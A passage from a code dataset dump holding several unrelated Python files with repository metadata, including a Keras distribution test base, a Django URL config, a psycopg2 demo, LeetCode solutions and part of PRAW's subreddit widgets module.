raise NotImplementedError
def run_correctness_test(self,
distribution,
use_numpy,
use_validation_data,
experimental_run_tf_function=None,
with_batch_norm=False,
is_stateful_model=False,
partial_last_batch=None,
training_epochs=2):
with self.cached_session():
self.set_up_test_config(use_numpy, use_validation_data, with_batch_norm)
if partial_last_batch == 'eval':
x_train, y_train, x_eval, y_eval, x_predict = (
self.get_data_with_partial_last_batch_eval())
elif partial_last_batch == 'train_and_eval':
x_train, y_train, x_eval, y_eval, x_predict = (
self.get_data_with_partial_last_batch())
else:
x_train, y_train, x_predict = self.get_data()
x_eval = x_train
y_eval = y_train
# The model is built once and the initial weights are saved.
# This is used to initialize the model for both the distribution and
# non-distribution run.
model = self.get_model(
experimental_run_tf_function=experimental_run_tf_function,
input_shapes=get_shapes(x_train))
initial_weights = model.get_weights()
ds_input_fn = functools.partial(
self.get_input_for_correctness_test,
use_numpy=use_numpy,
use_validation_data=use_validation_data,
with_distribution=distribution,
x_train=x_train,
y_train=y_train,
x_eval=x_eval,
y_eval=y_eval,
x_predict=x_predict,
training_epochs=training_epochs)
nods_input_fn = functools.partial(
self.get_input_for_correctness_test,
use_numpy=use_numpy,
use_validation_data=use_validation_data,
with_distribution=None,
x_train=x_train,
y_train=y_train,
x_eval=x_eval,
y_eval=y_eval,
x_predict=x_predict,
training_epochs=training_epochs)
results_with_ds = fit_eval_and_predict(
initial_weights,
input_fn=ds_input_fn,
model_fn=self.get_model,
experimental_run_tf_function=experimental_run_tf_function,
distribution=distribution,
is_stateful_model=is_stateful_model)
results_without_ds = fit_eval_and_predict(
initial_weights,
input_fn=nods_input_fn,
model_fn=self.get_model,
experimental_run_tf_function=experimental_run_tf_function,
distribution=None,
is_stateful_model=is_stateful_model)
# First, special case, for multi-replica distributed training, batch
# norm is not aggregated globally. So it is expected to have different
# weights.
if (self.with_batch_norm and distribution.num_replicas_in_sync > 1):
with self.assertRaises(AssertionError):
compare_results(
results_with_ds,
results_without_ds,
distribution,
testcase=self,
partial_last_batch=partial_last_batch)
else:
compare_results(
results_with_ds,
results_without_ds,
distribution,
testcase=self,
partial_last_batch=partial_last_batch)
def get_input_for_dynamic_lr_test(self, **kwargs):
"""Generates inputs that are dictionaries.
We only provide a default implementation of this method here. If you need
more customized way of providing input to your model, overwrite this method.
Arguments:
**kwargs: key word arguments about how to create the input dictionaries
Returns:
Three dictionaries representing the input for fit(), evalutate() and
predict()
"""
training_input = kwargs
return training_input, None, None
def run_dynamic_lr_test(self,
distribution,
experimental_run_tf_function=None):
with self.cached_session():
self.set_up_test_config()
x_train, y_train, _ = self.get_data()
model = self.get_model(
experimental_run_tf_function=experimental_run_tf_function,
input_shapes=get_shapes(x_train))
initial_weights = model.get_weights()
update_freq = None
if (isinstance(distribution, tpu_strategy.TPUStrategyV1) and
distribution.extended.steps_per_run > 1):
# For TPUStrategy with steps_per_run > 1, the callback is not invoked
# every step. So, to compare the CPU/TPU, we let the CPU to behave the
# same as TPU.
update_freq = distribution.extended.steps_per_run
training_epochs = 2
global_batch_size = 64
ds_batch_size = get_batch_size(global_batch_size, distribution)
nods_batch_size = get_batch_size(global_batch_size, None)
ds_input_fn = functools.partial(
self.get_input_for_dynamic_lr_test,
x=x_train,
y=y_train,
batch_size=ds_batch_size,
shuffle=False,
epochs=training_epochs,
callbacks=[LearningRateBatchScheduler(update_freq)],
validation_data=(x_train, y_train))
nods_input_fn = functools.partial(
self.get_input_for_dynamic_lr_test,
x=x_train,
y=y_train,
batch_size=nods_batch_size,
shuffle=False,
epochs=training_epochs,
callbacks=[LearningRateBatchScheduler(update_freq)],
validation_data=(x_train, y_train))
results_with_ds = fit_eval_and_predict(
initial_weights,
input_fn=ds_input_fn,
model_fn=self.get_model,
experimental_run_tf_function=experimental_run_tf_function,
distribution=distribution)
results_without_ds = fit_eval_and_predict(
initial_weights,
input_fn=nods_input_fn,
model_fn=self.get_model,
experimental_run_tf_function=experimental_run_tf_function,
distribution=None)
compare_results(
results_with_ds, results_without_ds, distribution, testcase=self)
class TestDistributionStrategyEmbeddingModelCorrectnessBase(
TestDistributionStrategyCorrectnessBase):
"""Base class to test correctness of Keras models with embedding layers."""
def get_data(self,
count=(_GLOBAL_BATCH_SIZE * _EVAL_STEPS),
min_words=5,
max_words=10,
max_word_id=19,
num_classes=2):
distribution = []
for _ in range(num_classes):
dist = np.abs(np.random.randn(max_word_id))
dist /= np.sum(dist)
distribution.append(dist)
features = []
labels = []
for _ in range(count):
label = np.random.randint(0, num_classes, size=1)[0]
num_words = np.random.randint(min_words, max_words, size=1)[0]
word_ids = np.random.choice(
max_word_id, size=num_words, replace=True, p=distribution[label])
word_ids = word_ids
labels.append(label)
features.append(word_ids)
features = keras.preprocessing.sequence.pad_sequences(
features, maxlen=max_words)
x_train = np.asarray(features, dtype=np.float32)
y_train = np.asarray(labels, dtype=np.int32).reshape((count, 1))
x_predict = x_train[:_GLOBAL_BATCH_SIZE]
return x_train, y_train, x_predict
if __name__ == '__main__':
test.main()
| [
"[email protected]"
]
| |
9e823061761c45f40f3539b926ffeadbb214da6c | 78ffdf4542ee11265f2190b29cef191814f0b778 | /CSDN数据挖掘培训/第二天/projy2/projy2/spiders/start.py | d7a3a28bb9bfdb405346ff6bef9374d005839973 | []
| no_license | linhuaxin93/LearnPython | c106d0c226af18d9b5b01ae97170f9cb5ca7e2b1 | c3730cdefe9179d5d1a7a46284e3be9747ababec | refs/heads/master | 2023-05-06T23:36:23.403410 | 2020-12-18T00:30:20 | 2020-12-18T00:30:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74 | py | from scrapy import cmdline
cmdline.execute(('scrapy crawl csdn'.split())) | [
"[email protected]"
]
| |
9c6962d424a390c3405c175a8872f70e709b0ce9 | 260f6aafc0ad0ddaba9d672a07ba3f2dd8822031 | /backend/doctor_24708/urls.py | cbd3997267bd3fea03835b10cc434b7fb020de29 | []
| no_license | crowdbotics-apps/doctor-24708 | 9419513611c41e4383a79a97b9e2b96d1f762919 | 74623cb899ba50ad6957cef018d61a000a2e5efb | refs/heads/master | 2023-03-09T08:48:37.840476 | 2021-02-25T04:21:40 | 2021-02-25T04:21:40 | 342,120,747 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,093 | py | """doctor_24708 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("modules/", include("modules.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
path("api/v1/", include("dating.api.v1.urls")),
path("dating/", include("dating.urls")),
path("home/", include("home.urls")),
]
admin.site.site_header = "doctor"
admin.site.site_title = "doctor Admin Portal"
admin.site.index_title = "doctor Admin"
# swagger
api_info = openapi.Info(
title="doctor API",
default_version="v1",
description="API documentation for doctor App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
| [
"[email protected]"
]
| |
740edc262fe586af8dcb9edc097db31e8e27aaf2 | eb028591eb2c22f5f00c82f901daa8ea4fd1f378 | /minio-test/config.py | 6c066d6b4b4cb6ab191848dce2c7002739f305fa | []
| no_license | matancarmeli7/cloudlet | 139c469ad778b3683ef0f379eeb66abe549c42ce | b7b57241a1f240b008ab0a9c6aa8aed02fc63b43 | refs/heads/master | 2022-12-06T19:56:00.873823 | 2021-01-03T14:30:08 | 2021-01-03T14:30:08 | 249,676,523 | 3 | 11 | null | 2022-12-06T17:38:16 | 2020-03-24T10:21:01 | HTML | UTF-8 | Python | false | false | 82 | py | bucket_name = 'mybucket-minio-test'
minio_url = 'minio.apps.dev.cloudlet-dev.com'
| [
"[email protected]"
]
| |
7efc136aaf2ae92ccc81f090ee865dba6abf2231 | 45ab4c22d918dc4390572f53c267cf60de0d68fb | /src/Analysis/Engine/Impl/Typeshed/third_party/2and3/Crypto/Util/RFC1751.pyi | 273204b24babd0a8b0f42f0ad4ca7df967b7998e | [
"MIT",
"Apache-2.0"
]
| permissive | sourcegraph/python-language-server | 580a24fd15fe9d4abeb95e9333d61db1c11a2670 | 64eae156f14aa14642afcac0e7edaf5d7c6d1a1c | refs/heads/master | 2023-04-09T21:17:07.555979 | 2018-12-06T23:25:05 | 2018-12-06T23:25:05 | 155,174,256 | 2 | 2 | Apache-2.0 | 2018-10-29T08:06:49 | 2018-10-29T08:06:49 | null | UTF-8 | Python | false | false | 168 | pyi | from typing import Any
__revision__ = ... # type: str
binary = ... # type: Any
def key_to_english(key): ...
def english_to_key(s): ...
wordlist = ... # type: Any
| [
"[email protected]"
]
| |
810b8e0187dfd900d3aaa49048955829777a39fc | 162e2588156cb2c0039c926c5c442363d9f77b00 | /tests/integration_tests/data_steward/utils/sandbox_test.py | eb5c79832b115f502c30291f17e07c1d6175b607 | [
"MIT"
]
| permissive | nishanthpp93/curation | 38be687240b52decc25ffb7b655f25e9faa40e47 | ac9f38b2f4580ae806121dd929293159132c7d2a | refs/heads/develop | 2022-08-08T20:33:53.125216 | 2021-12-03T21:38:48 | 2021-12-03T21:38:48 | 155,608,471 | 1 | 0 | MIT | 2020-10-09T01:14:39 | 2018-10-31T18:54:34 | Python | UTF-8 | Python | false | false | 2,053 | py | # Python imports
import os
import unittest
import app_identity
# Project Imports
from utils import sandbox
from utils.bq import get_client
class SandboxTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('**************************************************************')
print(cls.__name__)
print('**************************************************************')
def setUp(self):
self.project_id = app_identity.get_application_id()
self.dataset_id = os.environ.get('UNIONED_DATASET_ID')
self.sandbox_id = sandbox.get_sandbox_dataset_id(self.dataset_id)
self.fq_sandbox_id = f'{self.project_id}.{self.sandbox_id}'
# Removing any existing datasets that might interfere with the test
self.client = get_client(self.project_id)
def test_create_sandbox_dataset(self):
# pre-conditions
pre_test_datasets_obj = list(self.client.list_datasets(self.project_id))
pre_test_datasets = [d.dataset_id for d in pre_test_datasets_obj]
# Create sandbox dataset
sandbox_dataset = sandbox.create_sandbox_dataset(
self.project_id, self.dataset_id)
# Post condition checks
post_test_datasets_obj = list(self.client.list_datasets(
self.project_id))
post_test_datasets = [d.dataset_id for d in post_test_datasets_obj]
# make sure the dataset didn't already exist
self.assertTrue(sandbox_dataset not in pre_test_datasets)
# make sure it was actually created
self.assertTrue(sandbox_dataset in post_test_datasets)
# Try to create same sandbox, which now already exists
self.assertRaises(RuntimeError, sandbox.create_sandbox_dataset,
self.project_id, self.dataset_id)
def tearDown(self):
# Remove fake dataset created in project
self.client.delete_dataset(self.fq_sandbox_id,
delete_contents=True,
not_found_ok=True)
| [
"[email protected]"
]
| |
0a02e0e66c2bc59500b508dbfc467fcab4c3580d | 6febd920ced70cbb19695801a163c437e7be44d4 | /leetcode_oj/tree/lowest_common_ancestor.py | 36f0233451b0db28999def6a1c089ac431795fcf | []
| no_license | AngryBird3/gotta_code | b0ab47e846b424107dbd3b03e0c0f3afbd239c60 | b9975fef5fa4843bf95d067bea6d064723484289 | refs/heads/master | 2021-01-20T16:47:35.098125 | 2018-03-24T21:31:01 | 2018-03-24T21:31:01 | 53,180,336 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,814 | py | #!/usr/bin/python
'''
Find the least common ancestor in binary tree
'''
class TreeNode:
def __init__(self, val, l = None, r = None):
self.val = val
self.l = l
self.r = r
class Solution:
def findAncestor(self, tree, node1, node2):
if not node1 or not node2:
return None
node1_path = list()
node2_path = list()
if not self.find_path(tree, node1, node1_path) or \
not self.find_path(tree, node2, node2_path):
return None
print node1_path
print node2_path
#Find the first index where path doesn't match
i = 0
while (i < len(node1_path) and i < len(node2_path)):
if node1_path[i] != node2_path[i]:
break
i += 1
return node1_path[i-1]
def find_path(self, t, n, path):
if not t:
return False
path.append(t.val)
if n == t.val:
return True
if (t.l and self.find_path(t.l, n, path)) or (t.r and self.find_path(t.r, n, path)):
return True
path.pop()
return False
def lowestCommonAncestor(self, root, p, q):
if not root:
return None
if root == p or root == q:
return root
matching_left = self.lowestCommonAncestor(root.l, p, q)
matching_right = self.lowestCommonAncestor(root.r, p, q)
print "root : ", root.val, " m_l: ", matching_left.val if matching_left else "None", \
" m_r: ", matching_right.val if matching_right else "None"
#If both match, root is LCA
if matching_left and matching_right:
return root
#Found both the node on one side
return matching_left if matching_left else matching_right
s = Solution()
t8 = TreeNode(8, None, None)
t0 = TreeNode(0, None, None)
t1 = TreeNode(1, t0, t8)
t4 = TreeNode(4, None, None)
t7 = TreeNode(7, None, None)
t2 = TreeNode(2, t7, t4)
t6 = TreeNode(6, None, None)
t5 = TreeNode(5, t6, t2)
root = TreeNode(3, t5, t1)
print s.lowestCommonAncestor(root, t6, t4)
| [
"[email protected]"
]
| |
d7d6f389f59d7fc45035df1e7604d1558f038bec | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Clutter/ListModelClass.py | 9a7881b11b60fa1641da7dea25a2aa64f7fc3bcc | []
| no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,616 | py | # encoding: utf-8
# module gi.repository.Clutter
# from /usr/lib64/girepository-1.0/Clutter-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.Atk as __gi_repository_Atk
import gi.repository.GObject as __gi_repository_GObject
import gobject as __gobject
class ListModelClass(__gi.Struct):
"""
:Constructors:
::
ListModelClass()
"""
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
parent_class = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(ListModelClass), '__module__': 'gi.repository.Clutter', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'ListModelClass' objects>, '__weakref__': <attribute '__weakref__' of 'ListModelClass' objects>, '__doc__': None, 'parent_class': <property object at 0x7f541351b180>})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(ListModelClass)
| [
"[email protected]"
]
| |
ae10124f9637a093727bec5c3a8a47e836fbb458 | ad01faab6dd663dc5193eb8383fdc2d24c2df23d | /_psycopg2/main.py | 0da670d63333ca337b3b928c0fb107341902ee35 | []
| no_license | jurgeon018/snippets | 585db91b8120076b37deaa37393b34f7c61fec66 | e0ab24a99791c3b25422a3208f02919cf98ca084 | refs/heads/master | 2023-05-14T12:31:48.139452 | 2023-01-23T03:33:41 | 2023-01-23T03:33:41 | 222,001,233 | 0 | 0 | null | 2023-05-01T22:16:48 | 2019-11-15T20:51:27 | Python | UTF-8 | Python | false | false | 1,949 | py | import psycopg2
import psycopg2.extras
import psycopg2.errors
conn = psycopg2.connect(
database='psycopg2_test_db',
user='jurgeon',
password='69018',
host='127.0.0.1',
port=5432,
)
cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
# cur.execute('''
# create table users (id serial primary key, login varchar(64), password varchar(64))
# ''')
cur.execute("INSERT INTO users (login, password) VALUES (%s, %s)",
("afiskon", "123"))
cur.execute("INSERT INTO users (login, password) VALUES (%s, %s)",
("eax", "456"))
cur.execute(
"UPDATE users SET password = %(password)s WHERE login = %(login)s",
{"login":"eax", "password":"789"}
)
cur.execute("DELETE FROM users WHERE id = %s", (2,))
cur.execute("PREPARE insuser AS " +
"INSERT INTO users (login, password) VALUES ($1, $2)")
cur.execute("EXECUTE insuser(%s, %s)", ("afiskon", "123"))
cur.execute("EXECUTE insuser(%s, %s)", ("eax", "456"))
conn.commit()
cur.execute("SELECT version()")
cur.execute('SELECT * FROM users LIMIT 10')
print(cur.fetchone())
records = cur.fetchall()
# for record in records:
# # print(dict(record.items()))
# print(record['login'])
with conn:
with conn.cursor() as cur:
cur.close()
conn.close()
'''
# створює юзера в БД. Вводити 1 раз перед початком розробки.
sudo -u postgres psql -c "create user jurgeon with password '69018'; alter role jurgeon set client_encoding to 'utf8'; alter role jurgeon set default_transaction_isolation to 'read committed'; alter role jurgeon set timezone to 'UTC';"
# це не чіпай
#####sudo -u postgres psql -c 'create database psycopg2_test_db;'
#####sudo -u postgres psql -c 'grant all privileges on database psycopg2_test_db to jurgeon;'
# видаляє БД
sudo -u postgres psql -c "drop database eleek; "
# створює БД
sudo -u postgres psql -c "create database eleek owner jurgeon; "
''' | [
"[email protected]"
]
| |
daa62f58f170435922812b7e0cd13136bcac3329 | b1cf54e4d6f969d9084160fccd20fabc12c361c2 | /leetcode/first_bad_version.py | a240686a6a5620942a6e98d87cbde784e6963a9c | []
| no_license | zarkle/code_challenges | 88a53477d6f9ee9dd71577678739e745b9e8a694 | 85b7111263d4125b362184df08e8a2265cf228d5 | refs/heads/master | 2021-06-10T11:05:03.048703 | 2020-01-23T06:16:41 | 2020-01-23T06:16:41 | 136,668,643 | 0 | 1 | null | 2019-02-07T23:35:59 | 2018-06-08T21:44:26 | JavaScript | UTF-8 | Python | false | false | 1,159 | py | # https://leetcode.com/problems/first-bad-version/
# https://leetcode.com/articles/first-bad-version/
# The isBadVersion API is already defined for you.
# @param version, an integer
# @return a bool
# def isBadVersion(version):
class Solution:
def firstBadVersion(self, n):
"""
:type n: int
:rtype: int
"""
first = 0
last = n
while first <= last:
mid = (first + last) // 2
if isBadVersion(mid):
last = mid - 1
else:
first = mid + 1
return first
# 32 ms, 99.8%
# The isBadVersion API is already defined for you.
# @param version, an integer
# @return a bool
# def isBadVersion(version):
class Solution:
def firstBadVersion(self, n):
"""
:type n: int
:rtype: int
"""
first = 0
last = n
while first <= last:
mid = (first + last) // 2
if isBadVersion(mid) == True:
if isBadVersion(mid - 1) == False:
return mid
last = mid - 1
else:
first = mid + 1 | [
"[email protected]"
]
| |
8eef03e3062bcf936292ffcfe46b96d9859fc508 | 6ccb55befcbc69caa351b8337fdd40e55dbb802f | /venv/lib/python3.6/site-packages/praw/models/reddit/widgets.py | ad88158d6b187165598c7fa4f54b8ee1cd43a608 | []
| no_license | FiacreT/M-moire | cc0791cbf98bf565ea637e6ec409611bcc596c57 | 4089755191ffc848614247e98bbb641c1933450d | refs/heads/master | 2022-12-12T21:55:23.679854 | 2019-09-06T23:28:03 | 2019-09-06T23:28:03 | 187,702,532 | 2 | 2 | null | 2022-12-08T01:04:58 | 2019-05-20T19:39:21 | Python | UTF-8 | Python | false | false | 67,584 | py | """Provide classes related to widgets."""
import os.path
from json import dumps, JSONEncoder
from ...const import API_PATH
from ..base import PRAWBase
from ..list.base import BaseList
class Button(PRAWBase):
"""Class to represent a single button inside a :class:`.ButtonWidget`.
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``color`` The hex color used to outline the button.
``height`` Image height. Only present on image buttons.
``hoverState`` A ``dict`` describing the state of the button when
hovered over. Optional.
``kind`` Either ``'text'`` or ``'image'``.
``linkUrl`` A link that can be visited by clicking the button.
Only present on image buttons.
``text`` The text displayed on the button.
``url`` If the button is a text button, a link that can be
visited by clicking the button.
If the button is an image button, the URL of a
Reddit-hosted image.
``width`` Image width. Only present on image buttons.
======================= ===================================================
"""
class Image(PRAWBase):
"""Class to represent an image that's part of a :class:`.ImageWidget`.
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``height`` Image height.
``linkUrl`` A link that can be visited by clicking the image.
``url`` The URL of the (Reddit-hosted) image.
``width`` Image width.
======================= ===================================================
"""
class ImageData(PRAWBase):
"""Class for image data that's part of a :class:`.CustomWidget`.
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``height`` The image height.
``name`` The image name.
``url`` The URL of the image on Reddit's servers.
``width`` The image width.
======================= ===================================================
"""
class MenuLink(PRAWBase):
"""Class to represent a single link inside a menu or submenu.
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``text`` The text of the menu link.
``url`` The URL that the menu item links to.
======================= ===================================================
"""
class Submenu(BaseList):
r"""Class to represent a submenu of links inside a menu.
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``children`` A list of the :class:`.MenuLink`\ s in this
submenu. Can be iterated over by iterating over the
:class:`.Submenu` (e.g. ``for menu_link in
submenu``).
``text`` The name of the submenu.
======================= ===================================================
"""
CHILD_ATTRIBUTE = "children"
class SubredditWidgets(PRAWBase):
"""Class to represent a subreddit's widgets.
Create an instance like so:
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
Data will be lazy-loaded. By default, PRAW will not request progressively
loading images from Reddit. To enable this, instantiate a SubredditWidgets
object, then set the attribute ``progressive_images`` to ``True`` before
performing any action that would result in a network request.
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
widgets.progressive_images = True
for widget in widgets.sidebar:
# do something
Access a subreddit's widgets with the following attributes:
.. code-block:: python
print(widgets.id_card)
print(widgets.moderators_widget)
print(widgets.sidebar)
print(widgets.topbar)
The attribute :attr:`.id_card` contains the subreddit's ID card,
which displays information like the number of subscribers.
The attribute :attr:`.moderators_widget` contains the subreddit's
moderators widget, which lists the moderators of the subreddit.
The attribute :attr:`.sidebar` contains a list of widgets which make up
the sidebar of the subreddit.
The attribute :attr:`.topbar` contains a list of widgets which make up
the top bar of the subreddit.
To edit a subreddit's widgets, use :attr:`~.SubredditWidgets.mod`. For
example:
.. code-block:: python
widgets.mod.add_text_area('My title', '**bold text**',
{'backgroundColor': '#FFFF66',
'headerColor': '#3333EE'})
For more information, see :class:`.SubredditWidgetsModeration`.
To edit a particular widget, use ``.mod`` on the widget. For example:
.. code-block:: python
for widget in widgets.sidebar:
widget.mod.update(shortName='Exciting new name')
For more information, see :class:`.WidgetModeration`.
**Currently available Widgets**:
- :class:`.ButtonWidget`
- :class:`.Calendar`
- :class:`.CommunityList`
- :class:`.CustomWidget`
- :class:`.IDCard`
- :class:`.ImageWidget`
- :class:`.Menu`
- :class:`.ModeratorsWidget`
- :class:`.PostFlairWidget`
- :class:`.RulesWidget`
- :class:`.TextArea`
"""
@property
def id_card(self):
"""Get this subreddit's :class:`.IDCard` widget."""
if self._id_card is None:
self._id_card = self.items[self.layout["idCardWidget"]]
return self._id_card
@property
def items(self):
"""Get this subreddit's widgets as a dict from ID to widget."""
if self._items is None:
self._items = {}
for item_name, data in self._raw_items.items():
data["subreddit"] = self.subreddit
self._items[item_name] = self._reddit._objector.objectify(data)
return self._items
@property
def mod(self):
"""Get an instance of :class:`.SubredditWidgetsModeration`.
.. note::
Using any of the methods of :class:`.SubredditWidgetsModeration`
will likely result in the data of this :class:`.SubredditWidgets`
being outdated. To re-sync, call :meth:`.refresh`.
"""
if self._mod is None:
self._mod = SubredditWidgetsModeration(
self.subreddit, self._reddit
)
return self._mod
@property
def moderators_widget(self):
"""Get this subreddit's :class:`.ModeratorsWidget`."""
if self._moderators_widget is None:
self._moderators_widget = self.items[
self.layout["moderatorWidget"]
]
return self._moderators_widget
@property
def sidebar(self):
"""Get a list of Widgets that make up the sidebar."""
if self._sidebar is None:
self._sidebar = [
self.items[widget_name]
for widget_name in self.layout["sidebar"]["order"]
]
return self._sidebar
@property
def topbar(self):
"""Get a list of Widgets that make up the top bar."""
if self._topbar is None:
self._topbar = [
self.items[widget_name]
for widget_name in self.layout["topbar"]["order"]
]
return self._topbar
def refresh(self):
"""Refresh the subreddit's widgets.
By default, PRAW will not request progressively
loading images from Reddit. To enable this,
set the attribute ``progressive_images`` to ``True`` prior to
calling ``refresh()``.
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
widgets.progressive_images = True
widgets.refresh()
"""
self._fetch()
def __getattr__(self, attr):
"""Return the value of `attr`."""
if not attr.startswith("_") and not self._fetched:
self._fetch()
return getattr(self, attr)
raise AttributeError(
"{!r} object has no attribute {!r}".format(
self.__class__.__name__, attr
)
)
def __init__(self, subreddit):
"""Initialize the class.
:param subreddit: The :class:`.Subreddit` the widgets belong to.
"""
# set private variables used with properties to None.
self._id_card = self._moderators_widget = self._sidebar = None
self._topbar = self._items = self._raw_items = self._mod = None
self._fetched = False
self.subreddit = subreddit
self.progressive_images = False
super(SubredditWidgets, self).__init__(subreddit._reddit, {})
def __repr__(self):
"""Return an object initialization representation of the object."""
return "SubredditWidgets(subreddit={subreddit!r})".format(
subreddit=self.subreddit
)
def _fetch(self):
data = self._reddit.get(
API_PATH["widgets"].format(subreddit=self.subreddit),
params={"progressive_images": self.progressive_images},
)
self._raw_items = data.pop("items")
super(SubredditWidgets, self).__init__(self.subreddit._reddit, data)
# reset private variables used with properties to None.
self._id_card = self._moderators_widget = self._sidebar = None
self._topbar = self._items = None
self._fetched = True
class SubredditWidgetsModeration(object):
"""Class for moderating a subreddit's widgets.
Get an instance of this class from :attr:`.SubredditWidgets.mod`.
Example usage:
.. code-block:: python
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
reddit.subreddit('learnpython').widgets.mod.add_text_area(
'My title', '**bold text**', styles)
.. note::
To use this class's methods, the authenticated user must be a moderator
with appropriate permissions.
"""
def __init__(self, subreddit, reddit):
"""Initialize the class."""
self._subreddit = subreddit
self._reddit = reddit
def _create_widget(self, payload):
path = API_PATH["widget_create"].format(subreddit=self._subreddit)
widget = self._reddit.post(path, data={"json": dumps(payload)})
widget.subreddit = self._subreddit
return widget
def add_button_widget(
self, short_name, description, buttons, styles, **other_settings
):
r"""Add and return a :class:`.ButtonWidget`.
:param short_name: A name for the widget, no longer than 30 characters.
:param description: Markdown text to describe the widget.
:param buttons: A ``list`` of ``dict``\ s describing buttons, as
specified in `Reddit docs`_. As of this writing, the format is:
